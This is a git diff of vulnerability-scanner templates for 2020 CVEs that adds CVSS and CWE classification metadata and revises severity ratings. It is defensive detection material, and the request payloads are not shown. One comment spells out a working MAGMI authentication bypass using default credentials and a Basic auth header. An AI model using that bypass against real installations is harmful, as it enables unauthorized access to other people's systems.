--- a/cves/2020/CVE-2020-5307.yaml +++ b/cves/2020/CVE-2020-5307.yaml @@ -8,6 +8,11 @@ info: - https://cinzinga.com/CVE-2020-5307-5308/ severity: critical tags: cve,cve2020,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5307 + cwe-id: CWE-89 requests: - raw: diff --git a/cves/2020/CVE-2020-5405.yaml b/cves/2020/CVE-2020-5405.yaml index a103e34d12..4a7aa0348f 100644 --- a/cves/2020/CVE-2020-5405.yaml +++ b/cves/2020/CVE-2020-5405.yaml @@ -3,10 +3,15 @@ id: CVE-2020-5405 info: name: Spring Cloud Directory Traversal author: harshbothra_ - severity: high + severity: medium description: Spring Cloud Config, versions 2.2.x prior to 2.2.2, versions 2.1.x prior to 2.1.7, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack. reference: https://pivotal.io/security/cve-2020-5405 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5405 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5410.yaml b/cves/2020/CVE-2020-5410.yaml index 773e721bae..d4f7de242d 100644 --- a/cves/2020/CVE-2020-5410.yaml +++ b/cves/2020/CVE-2020-5410.yaml 
@@ -7,6 +7,11 @@ info: description: Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. reference: https://tanzu.vmware.com/security/cve-2020-5410 tags: cve,cve2020,lfi,springcloud + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-5410 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-5412.yaml b/cves/2020/CVE-2020-5412.yaml index a0b1eac7af..dad8fbb3f9 100644 --- a/cves/2020/CVE-2020-5412.yaml +++ b/cves/2020/CVE-2020-5412.yaml @@ -7,6 +7,11 @@ info: description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly. tags: cve,cve2020,ssrf,springcloud reference: https://tanzu.vmware.com/security/cve-2020-5412 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2020-5412 + cwe-id: CWE-610 requests: - method: GET diff --git a/cves/2020/CVE-2020-5776.yaml b/cves/2020/CVE-2020-5776.yaml index 513a3be8c5..23edf290ed 100644 --- a/cves/2020/CVE-2020-5776.yaml +++ b/cves/2020/CVE-2020-5776.yaml 
@@ -11,6 +11,11 @@ info: # Due to the lack of CSRF tokens, RCE (via phpcli command) is possible # in the event that a CSRF is leveraged against an existing admin session for MAGMI. # At the time of this advisory, no patch exists for this issue. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-5776 + cwe-id: CWE-352 requests: - raw: diff --git a/cves/2020/CVE-2020-5777.yaml b/cves/2020/CVE-2020-5777.yaml index 6dbfb02778..ad90884501 100644 --- a/cves/2020/CVE-2020-5777.yaml +++ b/cves/2020/CVE-2020-5777.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5777 info: name: Remote Auth Bypass in MAGMI (Magento Mass Importer) Plugin <= v0.7.23 author: dwisiswant0 - severity: high + severity: critical description: MAGMI versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. reference: https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 tags: cve,cve2020,magmi,magento @@ -12,6 +12,11 @@ info: # While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php # with default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=) # Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5777 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index 08d43a9cd4..176b2b2136 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml 
@@ -2,10 +2,15 @@ id: CVE-2020-5847 info: name: UnRaid Remote Code Execution author: madrobot - severity: high + severity: critical description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5847 + cwe-id: CWE-94,CWE-668 requests: - method: GET diff --git a/cves/2020/CVE-2020-5902.yaml b/cves/2020/CVE-2020-5902.yaml index e55a8ef228..c8698e5e5f 100644 --- a/cves/2020/CVE-2020-5902.yaml +++ b/cves/2020/CVE-2020-5902.yaml @@ -3,7 +3,7 @@ id: CVE-2020-5902 info: name: F5 BIG-IP TMUI RCE author: madrobot,dwisiswant0,ringo - severity: high + severity: critical description: In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. reference: - http://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html @@ -18,6 +18,11 @@ info: - https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/ - https://www.kb.cert.org/vuls/id/290915 tags: cve,cve2020,bigip,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-5902 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2020/CVE-2020-6207.yaml b/cves/2020/CVE-2020-6207.yaml index d36d906517..aa4f6887c5 100644 --- a/cves/2020/CVE-2020-6207.yaml +++ b/cves/2020/CVE-2020-6207.yaml 
@@ -14,6 +14,11 @@ info: - https://github.com/chipik/SAP_EEM_CVE-2020-6207 - https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/ - https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6207 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6287.yaml b/cves/2020/CVE-2020-6287.yaml index 46077c6fbd..d86e3db289 100644 --- a/cves/2020/CVE-2020-6287.yaml +++ b/cves/2020/CVE-2020-6287.yaml @@ -12,6 +12,11 @@ info: - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - https://github.com/chipik/SAP_RECON + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-6287 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index a0bb988cd8..7ff8dd8f94 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml 
@@ -6,6 +6,12 @@ info: severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC tags: cve,cve2020,sap,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-6308 + cwe-id: CWE-918 + description: "SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability." requests: - method: POST diff --git a/cves/2020/CVE-2020-6637.yaml b/cves/2020/CVE-2020-6637.yaml index 4c27c186ac..572f55b729 100644 --- a/cves/2020/CVE-2020-6637.yaml +++ b/cves/2020/CVE-2020-6637.yaml @@ -3,12 +3,17 @@ id: CVE-2020-6637 info: name: OpenSIS v7.3 unauthenticated SQL injection author: pikpikcu - severity: high + severity: critical description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php. tags: cve,cve2020,sqli,opensis reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-6637 - https://cinzinga.com/CVE-2020-6637/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-6637 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index d08e8d811a..ddd44f6016 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml 
@@ -12,6 +12,10 @@ info: - https://github.com/HewlettPackard/LinuxKI/releases/tag/v6.0-2 - https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - https://www.hpe.com/us/en/home.html # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7209 requests: - method: GET diff --git a/cves/2020/CVE-2020-7247.yaml b/cves/2020/CVE-2020-7247.yaml index f040fb2e36..f570b6ab86 100644 --- a/cves/2020/CVE-2020-7247.yaml +++ b/cves/2020/CVE-2020-7247.yaml @@ -5,6 +5,12 @@ info: severity: critical reference: https://www.openwall.com/lists/oss-security/2020/01/28/3 tags: cve,cve2020,smtp,opensmtpd,network,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7247 + cwe-id: CWE-78,CWE-755 + description: "smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation." network: - inputs: diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 0d6ceac8da..7f5f53afc6 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -13,6 +13,11 @@ info: reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2020-7318 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-7796.yaml b/cves/2020/CVE-2020-7796.yaml index 1ca340cabb..3c7e70486f 100644 --- a/cves/2020/CVE-2020-7796.yaml +++ b/cves/2020/CVE-2020-7796.yaml 
@@ -8,6 +8,11 @@ info: reference: - https://www.adminxe.com/2183.html tags: cve,cve2020,zimbra,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 requests: - raw: diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 9f314f0f40..dd62e8fa68 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -10,6 +10,11 @@ info: - https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-7961 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2020/CVE-2020-8091.yaml b/cves/2020/CVE-2020-8091.yaml index 0e62f1aae1..96ccd5bd0a 100644 --- a/cves/2020/CVE-2020-8091.yaml +++ b/cves/2020/CVE-2020-8091.yaml @@ -9,6 +9,11 @@ info: reference: - https://typo3.org/security/advisory/typo3-psa-2019-003/ - https://www.purplemet.com/blog/typo3-xss-vulnerability + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8091 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8115.yaml b/cves/2020/CVE-2020-8115.yaml index f12449e30e..f38b0a3567 100644 --- a/cves/2020/CVE-2020-8115.yaml +++ b/cves/2020/CVE-2020-8115.yaml @@ -10,6 +10,11 @@ info: - https://hackerone.com/reports/775693 - https://www.revive-adserver.com/security/revive-sa-2020-001/ tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8115 + cwe-id: CWE-79 requests: - method: GET 
diff --git a/cves/2020/CVE-2020-8163.yaml b/cves/2020/CVE-2020-8163.yaml index 396f4c1b06..b638675ca1 100644 --- a/cves/2020/CVE-2020-8163.yaml +++ b/cves/2020/CVE-2020-8163.yaml @@ -7,6 +7,11 @@ info: description: Tests for ability to pass user parameters as local variables into partials reference: https://correkt.horse/ruby/2020/08/22/CVE-2020-8163/ tags: cve,cve2020,rails,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8163 + cwe-id: CWE-94 requests: - method: GET diff --git a/cves/2020/CVE-2020-8191.yaml b/cves/2020/CVE-2020-8191.yaml index 653c89b7d0..850e1e43ea 100644 --- a/cves/2020/CVE-2020-8191.yaml +++ b/cves/2020/CVE-2020-8191.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8191 info: name: Citrix ADC & NetScaler Gateway Reflected XSS author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix,xss reference: https://support.citrix.com/article/CTX276688 description: | Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS). + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8191 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2020/CVE-2020-8193.yaml b/cves/2020/CVE-2020-8193.yaml index b63ac93a82..286402bddc 100644 --- a/cves/2020/CVE-2020-8193.yaml +++ b/cves/2020/CVE-2020-8193.yaml 
@@ -3,12 +3,17 @@ id: CVE-2020-8193 info: name: Citrix unauthenticated LFI author: pdteam - severity: high + severity: medium reference: - https://github.com/jas502n/CVE-2020-8193 - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html description: Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints. tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8193 + cwe-id: CWE-862 requests: - raw: diff --git a/cves/2020/CVE-2020-8194.yaml b/cves/2020/CVE-2020-8194.yaml index 1c08f85a0f..70af4732d1 100644 --- a/cves/2020/CVE-2020-8194.yaml +++ b/cves/2020/CVE-2020-8194.yaml @@ -3,10 +3,15 @@ id: CVE-2020-8194 info: name: Citrix ADC & NetScaler Gateway Reflected Code Injection author: dwisiswant0 - severity: high + severity: medium tags: cve,cve2020,citrix description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download. reference: https://support.citrix.com/article/CTX276688 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2020-8194 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2020/CVE-2020-8209.yaml b/cves/2020/CVE-2020-8209.yaml index 6b7489c55f..6b809abb63 100644 --- a/cves/2020/CVE-2020-8209.yaml +++ b/cves/2020/CVE-2020-8209.yaml 
@@ -12,6 +12,11 @@ info: reference: - https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/ tags: cve,cve2020,citrix,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8209 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-8512.yaml b/cves/2020/CVE-2020-8512.yaml index d63d614467..8db1c6dddd 100644 --- a/cves/2020/CVE-2020-8512.yaml +++ b/cves/2020/CVE-2020-8512.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/47988 - https://twitter.com/sagaryadav8742/status/1275170967527006208 tags: cve,cve2020,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-8512 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-8515.yaml b/cves/2020/CVE-2020-8515.yaml index da3aec26dd..05ec699777 100644 --- a/cves/2020/CVE-2020-8515.yaml +++ b/cves/2020/CVE-2020-8515.yaml @@ -9,6 +9,11 @@ info: - https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515) - https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/ tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8515 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8771.yaml b/cves/2020/CVE-2020-8771.yaml index 5cf989eb97..6a244c4df1 100644 --- a/cves/2020/CVE-2020-8771.yaml +++ b/cves/2020/CVE-2020-8771.yaml 
@@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/SECFORCE/WPTimeCapsulePOC tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-8771 + cwe-id: CWE-287 + description: "The Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts." requests: - raw: diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 0a036e89a5..988906da9e 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -3,11 +3,16 @@ id: CVE-2020-8813 info: name: Cacti v1.2.8 - Unauthenticated Remote Code Execution author: gy741 - severity: critical + severity: high description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability reference: - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ tags: cve,cve2020,cacti,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-8813 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2020/CVE-2020-8982.yaml b/cves/2020/CVE-2020-8982.yaml index 74819b7066..34b82f700e 100644 --- a/cves/2020/CVE-2020-8982.yaml +++ b/cves/2020/CVE-2020-8982.yaml 
@@ -7,6 +7,11 @@ info: description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020. tags: cve,cve2020,citrix,lfi reference: https://support.citrix.com/article/CTX269106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-8982 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-9036.yaml b/cves/2020/CVE-2020-9036.yaml index 1f7d2d46bb..e19606cf3b 100644 --- a/cves/2020/CVE-2020-9036.yaml +++ b/cves/2020/CVE-2020-9036.yaml @@ -8,6 +8,12 @@ info: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 tags: cve,cve2020,xss,jeedom + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9036 + cwe-id: CWE-79 + description: "Jeedom through 4.0.38 allows XSS." requests: - method: GET diff --git a/cves/2020/CVE-2020-9047.yaml b/cves/2020/CVE-2020-9047.yaml index b7e04c9990..29d78f3858 100644 --- a/cves/2020/CVE-2020-9047.yaml +++ b/cves/2020/CVE-2020-9047.yaml @@ -21,6 +21,11 @@ info: - https://www.johnsoncontrols.com/cyber-solutions/security-advisories - https://www.us-cert.gov/ics/advisories/ICSA-20-170-01 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2020-9047 + cwe-id: CWE-347 requests: - method: GET diff --git a/cves/2020/CVE-2020-9054.yaml b/cves/2020/CVE-2020-9054.yaml index ff2a299a2b..e7fb124544 100644 --- a/cves/2020/CVE-2020-9054.yaml +++ b/cves/2020/CVE-2020-9054.yaml 
@@ -19,6 +19,11 @@ info: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-9054 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-9315.yaml b/cves/2020/CVE-2020-9315.yaml index f244463bf9..14eed4ccd2 100644 --- a/cves/2020/CVE-2020-9315.yaml +++ b/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,12 @@ info: severity: high reference: https://www.cvebase.com/cve/2020/9315 tags: cve,cve2020,oracle + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9315 + cwe-id: CWE-306 + description: "** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE." requests: - method: GET diff --git a/cves/2020/CVE-2020-9344.yaml b/cves/2020/CVE-2020-9344.yaml index c36d080c80..760e443f9a 100644 --- a/cves/2020/CVE-2020-9344.yaml +++ b/cves/2020/CVE-2020-9344.yaml @@ -10,6 +10,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-007.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-9344 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-9376.yaml b/cves/2020/CVE-2020-9376.yaml index 66b1211b6b..a8e7f8c014 100644 --- a/cves/2020/CVE-2020-9376.yaml +++ b/cves/2020/CVE-2020-9376.yaml 
@@ -13,6 +13,11 @@ info: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 - https://www.dlink.com.br/produto/dir-610/ tags: cve,cve2020,dlink + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9376 + cwe-id: CWE-74 requests: - method: POST path: diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index c9f38d9a42..172130f2c4 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -10,6 +10,11 @@ info: author: geeknik severity: high tags: cve,cve2020,django,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-9402 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index 2336c16344..239b63a125 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -8,6 +8,11 @@ info: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 tags: cve,cve2020,rconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9425 + cwe-id: CWE-670 requests: - method: GET diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml index e0017d5eda..ef8f233909 100644 --- a/cves/2020/CVE-2020-9483.yaml +++ b/cves/2020/CVE-2020-9483.yaml 
@@ -8,6 +8,11 @@ info: When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. reference: https://github.com/apache/skywalking/pull/4639 tags: cve,cve2020,sqli,skywalking + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-9483 + cwe-id: CWE-89 requests: - method: POST diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml index 4765190c8e..95f1a4eec0 100644 --- a/cves/2020/CVE-2020-9484.yaml +++ b/cves/2020/CVE-2020-9484.yaml @@ -14,6 +14,11 @@ info: tags: cve,cve2020,apache reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.00 + cve-id: CVE-2020-9484 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml index cd341cf256..583cee2db1 100644 --- a/cves/2020/CVE-2020-9490.yaml +++ b/cves/2020/CVE-2020-9490.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9490 info: name: CVE-2020-9490 - severity: medium + severity: high description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers. author: philippedelteil tags: cve,cve2020,apache,dos 
